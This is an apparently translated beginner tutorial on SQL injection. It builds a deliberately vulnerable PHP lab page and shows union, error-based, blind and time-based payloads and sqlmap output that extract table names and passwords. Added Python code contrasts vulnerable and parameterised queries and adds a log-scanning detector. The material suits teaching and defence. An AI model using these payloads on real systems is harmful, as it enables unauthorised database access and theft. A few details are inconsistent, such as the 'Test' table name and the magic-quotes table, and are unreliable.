SQL Injection for Beginners (SQL Injection 幼幼班)
Hugo
2016/5/3
Wikipedia definition
• SQL injection (SQL attack, known in Chinese as 隱碼攻擊) is a security vulnerability at the database layer of an application. In short, SQL commands are smuggled inside an input string; when a poorly designed program fails to check the input, the database server mistakes the smuggled commands for legitimate SQL and executes them, leading to data destruction or system compromise.
A simple example
• SQL query code for login validation
• strSQL = "SELECT * FROM users WHERE (name = '" + userName + "') and (pw = '"+ passWord +"');"
• Malicious input
• userName = "1' OR '1'='1";
• passWord = "1' OR '1'='1";
• The SQL query becomes
• strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"
• strSQL = "SELECT * FROM users;" (result=true: the site can be logged into without any account or password)
SQL Injection Lab
• Lab steps
• Set up the target system
• Union Based Injection
• Error Based Injection
• Boolean Based Blind Injection
• Time Based Blind Injection
• Analyse the weakness with sqlmap
Setting up the target system
Creating the database
# mysql -uroot -pspy123 test < test.mysql
# mysql -uroot -pspy123 test -e "show tables"
+----------------+
| Tables_in_test |
+----------------+
| fruit          |
| user           |
+----------------+
# mysql -uroot -pspy123 test -e "select * from fruit"
+----+--------+
| ID | Name   |
+----+--------+
|  1 | apple  |
|  2 | banana |
|  3 | cherry |
|  4 | date   |
+----+--------+
# mysql -uroot -pspy123 test -e "select * from user"
+----+------+------+
| ID | Name | Pass |
+----+------+------+
|  1 | aaa  | 111  |
|  2 | bbb  | 222  |
|  3 | ccc  | 333  |
+----+------+------+
hackme.php (attack target)
<?php
// Deliberately vulnerable: the id parameter is interpolated straight into the SQL string.
$id = $_GET["id"];
$link = mysql_connect('localhost', 'root', 'spy123');
if (!$link) die('Not connected : ' . mysql_error());
$db_selected = mysql_select_db('test', $link);
if (!$db_selected) die('Can\'t use foo : ' . mysql_error());
$db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;";
echo $db_query . "<hr>";   // echoes the exact SQL that is about to run back to the client
$result = mysql_query($db_query);
if (!$result) die('Invalid query: ' . mysql_error());   // raw DBMS error text reaches the client
while ($row = mysql_fetch_assoc($result)) {
    echo "name: " . $row['Name'] . "<br>";
}
mysql_free_result($result);
?>
Trying it out
• Normal query (https://192.168.200.61/hackme.php?id=1)
• Input: 1
• Query: SELECT * FROM Test WHERE ID='1' LIMIT 0,1;
• Response: name: apple
• Test whether the input is wrapped in single quotes inside the query (SELECT * FROM Test WHERE ID='1' LIMIT 0,1;)
• input: 1 >> name: apple
• input: 1' >> Invalid query: You have an error in your SQL syntax...
• input: 1" >> name: apple
• input: 1' or '1'='1 >> name: apple
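As an added example (not code from the deck), the login bypass from the simple example and the quote probes against hackme.php are replayed here in Python against an in-memory SQLite copy of the lab's fruit and user tables, with the parameterised form beside each vulnerable query. SQLite stands in for the deck's MariaDB and the lab's user table stands in for the wiki example's users table; both are assumptions of this example.

```python
import sqlite3

# Constructed in-memory stand-in for the deck's "test" database (SQLite instead of
# MariaDB so this runs offline); rows copied from the lab's fruit and user tables.
FRUIT_ROWS = [(1, "apple"), (2, "banana"), (3, "cherry"), (4, "date")]
USER_ROWS = [(1, "aaa", "111"), (2, "bbb", "222"), (3, "ccc", "333")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE fruit (ID INTEGER, Name TEXT);"
        "CREATE TABLE user (ID INTEGER, Name TEXT, Pass TEXT);"
    )
    conn.executemany("INSERT INTO fruit VALUES (?, ?)", FRUIT_ROWS)
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", USER_ROWS)
    return conn


def fruit_lookup_vulnerable(conn, id_param):
    """Mirrors hackme.php: the raw id is pasted into the SQL text, so a quote
    inside it changes the structure of the statement."""
    sql = f"SELECT * FROM fruit WHERE ID='{id_param}' LIMIT 0,1;"
    try:
        return [f"name: {row[1]}" for row in conn.execute(sql)]
    except sqlite3.Error as exc:  # hackme.php prints "Invalid query: ..." at this point
        return [f"Invalid query: {exc}"]


def fruit_lookup_safe(conn, id_param):
    """Hardened form: the id travels as a bound parameter and the SQL text is fixed,
    so a quote in the input is just a character that matches no row."""
    sql = "SELECT * FROM fruit WHERE ID=? LIMIT 0,1;"
    return [f"name: {row[1]}" for row in conn.execute(sql, (id_param,))]


def login_vulnerable(conn, user_name, pass_word):
    """The deck's login check built by string concatenation (lab table 'user')."""
    sql = ("SELECT * FROM user WHERE (Name = '" + user_name + "') and (Pass = '"
           + pass_word + "');")
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False


def login_safe(conn, user_name, pass_word):
    """Same check with placeholders: the tautology payload can no longer escape the
    string literal, so it is compared as a plain name/password and fails."""
    sql = "SELECT * FROM user WHERE Name = ? and Pass = ?;"
    return len(conn.execute(sql, (user_name, pass_word)).fetchall()) > 0


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1' or '1'='1"):
        print(repr(probe), "vulnerable:", fruit_lookup_vulnerable(db, probe),
              "safe:", fruit_lookup_safe(db, probe))
    payload = "1' OR '1'='1"
    print("login vulnerable:", login_vulnerable(db, payload, payload))
    print("login safe:", login_safe(db, payload, payload))
```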
Union Based Injection
Technique
• Use UNION to attach a second SELECT statement after the normal input and use it to probe system information.
• The attacker appends to the affected parameter a syntactically valid SQL statement starting with a UNION ALL SELECT.
Guessing the number of columns in the table
• Original SQL query
• $db_query = "SELECT * FROM fruit WHERE ID='$id' LIMIT 0,1;";
• SQL injection shows that the fruit table has two columns
• $db_query = "SELECT * FROM fruit WHERE ID='1' union select 1, 2-- -LIMIT 0,1;"; (the trailing LIMIT 0,1 is commented out)
Finding system information
Target           Input                               Response
Database name    -1' union select 1,database()-- -   name: test
Server version   -1' union select 1,version()-- -    name: 5.5.33a-MariaDB
Database user    -1' union select 1,user()-- -       name: root@localhost
• SQL Query (version example): SELECT * FROM fruit WHERE ID='-1' union select 1,version()-- -' LIMIT 0,1;
Finding table names
• Input
• -1' union select 1,table_name from information_schema.tables where table_schema=database()--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' union select 1,table_name from information_schema.tables where table_schema=database()-- ' LIMIT 0,1;
• Response
• name: fruit
• name: user
Finding column names
• Input
• -1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' union Select 1,column_name from information_schema.columns where table_schema=database() and table_name='user'-- ' LIMIT 0,1;
• Response
• name: ID
• name: Name
• name: Pass
Finding table data
• Input
• -1' union Select 1,concat(ID,", ",Name,", ",Pass) from user--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' union Select 1,concat(ID,", ",Name,", ",Pass) from user-- ' LIMIT 0,1;
• Response
• name: 1, aaa, 111
• name: 2, bbb, 222
• name: 3, ccc, 333
Error Based Injection
Technique
• Pass unsanitised input that triggers a database error, then read what the resulting error message leaks.
• The attacker replaces or appends to the affected parameter a database-specific error-message-provoking statement and parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and the subquery statement output within.
Finding the current database name
• Input
• -1' and extractvalue(0x0a,concat(0x0a,(select database())))--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select database())))-- ' LIMIT 0,1;
• Response
• Invalid query: XPATH syntax error: ' test'
Finding the current table name
• Input
• -1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+
• SQL Query
• SELECT * FROM fruit WHERE ID='-1' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))-- ' LIMIT 0,1;
• Response
• Invalid query: XPATH syntax error: ' fruit'
Boolean Based Blind Injection
Technique
• Sometimes the system does not have enough weaknesses to hand you the answer conveniently, so all you can do is play a yes/no (true/false) game with the target.
• Using the query substring(string_to_guess, N, 1)=D, guess whether the N-th character of string_to_guess is D (given in decimal).
• The attacker replaces or appends to the affected parameter in the HTTP request a syntactically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose output the user wants to retrieve.
Guessing the database version
• Guess that the major version is 4
• Input: 1' and substring(version(),1,1)=4--+
• SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(),1,1)=4-- ' LIMIT 0,1;
• Response: (no row returned)
• Guess that the major version is 5
• Input: 1' and substring(version(),1,1)=5--+
• SQL Query: SELECT * FROM fruit WHERE ID='1' and substring(version(),1,1)=5-- ' LIMIT 0,1;
• Response: name: apple
Guessing table names
• Input
• 1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))>64--+
• SQL Query
• SELECT * FROM fruit WHERE ID='1' and ascii(substring((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))>64-- ' LIMIT 0,1;
• Steps
• >64 (row returned); >112 (no row); >95 (row returned); >110 (no row); >103 (no row); >100 (row returned); >102 (no row); >101 (row returned); =102 (row returned)
• First character of the table name: "f" (decimal 102); repeating the steps above recovers the table name: "fruit"
Guessing column names
• Guess the letters of the first column name in the fruit table
• 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),1,1))=73--+
• 1' and ascii(substring((select concat(column_name) from information_schema.columns where table_name="fruit" limit 0,1),2,1))=68--+
• First column name of the fruit table: "ID" (decimal 73, 68)
Guessing column data
• Value of the Name column in the second row of the fruit table
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),1,1))=98--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),2,1))=97--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),3,1))=110--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),4,1))=97--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),5,1))=110--+
• 1' and ascii(substring((select concat(Name) from fruit limit 1,1),6,1))=97--+
• Column value: "banana" (decimal 98, 97, 110, 97, 110, 97)
Time Based Blind Injection
Technique
• In the worst case the target will not even play the yes/no (true/false) game with you, and the only way left to probe system information is through time delays.
• Time-based techniques are often used to achieve tests when there is no other way to retrieve information from the database server. This kind of attack injects a SQL segment which contains a specific DBMS function or heavy query that generates a time delay.
How to work out the SQL query
• Comment style: --+
• SQL Query: SELECT * FROM fruit WHERE ID='1'
Analysing the weakness with sqlmap
Why use sqlmap
• The attacker does not know what the SQL query looks like
• Guessing at system weaknesses by hand is usually slow and laborious
Command
• # sqlmap -u "https://192.168.200.61/hackme.php?id=1" --force-ssl --dbms=mysql -p id
• -u "https://192.168.200.61/...": the URL to attack
• --force-ssl: force SSL/HTTPS
• --dbms=mysql: force the back-end DBMS type
• -p id: the parameter to test
sqlmap output
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5529=5529 AND 'vZzG'='vZzG

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 9346 FROM(SELECT COUNT(*),CONCAT(0x71626a6a71,(SELECT (ELT(9346=9346,1))),0x71766b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHGd'='eHGd

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))VcYN) AND 'yLgG'='yLgG

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626a6a71,0x78576371715058656452616346686d506c666643427a52514775456778504d50744e504951505a54,0x71766b7871)-- -
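Seen from the defender's side, the probes the deck walks through and the payloads sqlmap reports all end up in the web server's access log. This added example (not from the deck or from sqlmap) runs a small rule set over a constructed log excerpt that replays those requests against hackme.php; the log lines, rule names and regular expressions are assumptions of this example, and the rules deliberately work on the URL-decoded parameter value so that %27, + and %2B encodings do not hide anything.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log excerpt (Apache combined-style; only the request line matters).
# The 192.168.200.77 requests replay probes from the deck: the quote test, the
# tautology, union/information_schema enumeration, extractvalue and sqlmap's SLEEP.
SAMPLE_LOG = """\
192.168.200.10 - - [03/May/2016:10:00:01 +0800] "GET /hackme.php?id=1 HTTP/1.1" 200 87
192.168.200.10 - - [03/May/2016:10:00:02 +0800] "GET /echo.php?input=hugo%27s+secret HTTP/1.1" 200 45
192.168.200.77 - - [03/May/2016:10:05:11 +0800] "GET /hackme.php?id=1%27 HTTP/1.1" 200 130
192.168.200.77 - - [03/May/2016:10:05:12 +0800] "GET /hackme.php?id=1%27+or+%271%27%3D%271 HTTP/1.1" 200 87
192.168.200.77 - - [03/May/2016:10:05:20 +0800] "GET /hackme.php?id=-1%27+union+select+1,database()--+- HTTP/1.1" 200 90
192.168.200.77 - - [03/May/2016:10:05:25 +0800] "GET /hackme.php?id=-1%27+union+select+1,table_name+from+information_schema.tables+where+table_schema%3Ddatabase()--%2B HTTP/1.1" 200 95
192.168.200.77 - - [03/May/2016:10:05:31 +0800] "GET /hackme.php?id=-1%27+and+extractvalue(0x0a,concat(0x0a,(select+database())))--%2B HTTP/1.1" 200 140
192.168.200.77 - - [03/May/2016:10:06:02 +0800] "GET /hackme.php?id=1%27+AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))VcYN)+AND+%27yLgG%27%3D%27yLgG HTTP/1.1" 200 87
"""

# client, method, request target and status code from one combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')

# One rule per probe shape the deck walks through; each runs on the decoded value.
RULES = [
    ("quote_probe", re.compile(r"""^-?\d+['"]""")),                      # 1'  /  -1'
    ("tautology", re.compile(r"\b(?:and|or)\s+'?(\w+)'?\s*=\s*'?\1\b", re.I)),
    ("union_select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("error_based", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("time_based", re.compile(r"\bsleep\s*\(", re.I)),
    ("comment_terminator", re.compile(r"--[\s+-]")),                     # "-- -", "--+"
]


def classify_value(value):
    """Return the names of every rule that fires on one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(text):
    """Return one finding per query-string value that trips at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qs turns '+' into a space and decodes %xx, so the rules see the
        # same text the vulnerable script would paste into its SQL
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                rules = classify_value(value)
                if rules:
                    findings.append({"client": client, "path": parts.path,
                                     "param": param, "value": value,
                                     "rules": rules, "status": status})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["path"], f["param"], f["rules"], repr(f["value"]))
```

The benign apostrophe in hugo's secret trips nothing, which is the false-positive check worth keeping when tuning rules like these.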
The experiments above are entirely fictional; any resemblance to real systems is purely coincidental.
Magic Quotes has been turned off
• Meant to keep data sent from the client to the server from carrying malicious content.
• When magic_quotes_gpc=on, data arriving from the client through $_GET, $_POST, $_COOKIE and the like that contains a single quote, double quote or backslash automatically gets a backslash prepended to escape that character.
• echo.php
<?php echo $_GET["input"]; ?>
• HTTP GET
https://192.168.200.61/echo.php?input=hugo's secret
magic_quotes_gpc   Response
On                 hugo's secret
Off                hugo's secret
References
• http://securityidiots.com/Web-Pentest/SQL-Injection
• https://github.com/sqlmapproject/sqlmap/wiki/Usage
• http://php.net/manual/en/security.magicquotes.disabling.php
